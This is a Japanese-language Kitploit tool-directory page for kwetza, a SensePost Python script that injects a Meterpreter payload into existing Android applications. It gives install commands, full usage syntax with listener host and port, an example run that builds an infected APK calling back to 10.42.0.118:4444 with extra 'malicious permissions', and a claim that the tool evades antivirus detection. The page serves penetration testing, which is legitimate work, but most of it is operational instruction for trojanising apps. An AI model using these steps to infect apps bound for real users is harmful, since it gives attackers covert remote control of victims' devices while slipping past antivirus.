Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
kwetza — 既存のAndroidアプリケーションにメータープリターのペイロードを注入するためのPythonスクリプト。 | Kitploit
ツール/GitHubGitHub/sensepost/kwetza
Androidセキュリティペイロード生成エクスプロイトモバイルアプリペンテストペネトレーションテストペイロード開発
GitHubsensepost/kwetza

kwetza

既存のAndroidアプリケーションにメータープリターのペイロードを注入するためのPythonスクリプト。

リポジトリを見る
644239238年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

はじめに

Arsenal

Chris Le Roy(@brompwnie)[email protected] 作

Kwetza は、既存の Android アプリケーションに Meterpreter ペイロードを感染させることを可能にするツールです。

機能

Kwetza は、カスタムまたはデフォルトのペイロードテンプレートを使用して既存の Android アプリケーションに感染させ、アンチウイルスによる検出を回避します。Kwetza を使用すると、ターゲットアプリケーションのデフォルト権限を使用して Android アプリケーションに感染させるか、追加の権限を注入してさらなる機能を得ることができます。

ブログ記事の入手先

Kwetza で自動化された手動手順はこちらにあります: https://sensepost.com/blog/2016/kwetza-infecting-android-applications/

コードの入手

まずコードを入手してください:

root@kitploit:~
git clone https://github.com/sensepost/kwetza.git

Kwetza は Python で書かれており、Pip を使用してインストールできる BeautifulSoup が必要です:

root@kitploit:~
pip install beautifulsoup4

Kwetza は Apktool がインストールされ、PATH からアクセス可能である必要があります。これは、次のインストール手順に従ってセットアップできます: https://ibotpeaches.github.io/Apktool/install

使用方法

python kwetza.py nameOfTheApkToInfect.apk https/tcp LHOST LPORT yes/no customClass

  • nameOfTheApkToInfect.apk = 感染させたい APK の名前。
  • https/tcp = HTTPS または TCP 接続の選択。
  • LHOST = リスナーの IP。
  • LPORT = リスナーのポート。
  • yes = "yes" を指定すると、アプリに追加の不正な権限を注入します。"no" を指定すると、アプリのデフォルト権限を使用します。
  • customClass = Kwetza にこのアクティビティに注入させたい場合、ここにカスタムアクティビティを指定します。
root@kitploit:~
python kwetza.py hackme.apk https 10.42.0.118 4444 yes com.moo.another.activity
[+] MMMMMM KWETZA
[*] DECOMPILING TARGET APK
[+] ENDPOINT IP: 10.42.0.118
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS
[*] BYTING COMMS...
[*] ANALYZING ANDROID MANIFEST...
[+] TARGET ACTIVITY: com.foo.moo.gui.MainActivity
[*] INJECTION INTO APK
[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED
[*] INJECTION OF CRAZY PERMS TO BE DONE!
[+] TIME TO BUILD INFECTED APK
[*] EXECUTING APKTOOL BUILD COMMAND
[+] BUILD RESULT
############################################
I: Using APktool 2.2.0
I: Checking whether source shas changed...
I: Smaling smali folder into classes.dex
I: Checking whether resources has changed...
I: Building resources...
I: Copying libs ...(/lib)
I: Building apk file...
I: Copying unknown files/dir...
###########################################
[*] EXECUTING JARSIGNER COMMAND...
Enter Passphrase for keystore: password
[+] JARSIGNER RESULT
###########################################
jar signed.

###########################################

[+] L00t located at hackme/dist/hackme.apk

情報

Kwetza は Python 2 で動作するように開発されています。

デフォルトでは、Kwetza は "payload" フォルダにあるテンプレートとキーストアを使用して、感染した APK を注入および署名します。

感染したアプリケーションを独自の証明書で署名したい場合は、新しいキーストアを生成して "payload" フォルダに配置し、既存のキーストアにリネームするか、kwetza.py 内の参照を変更してください。

ペイロードテンプレートについても同様に行えます。

デフォルトのキーストアのパスワードは、まあ、"password" です。

ライセンス

Kwetza は Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License(http://creativecommons.org/licenses/by-nc-sa/4.0)の下でライセンスされています。

このライセンスの範囲を超える許可については、http://sensepost.com/contact で入手できる場合があります。

ツールをダウンロード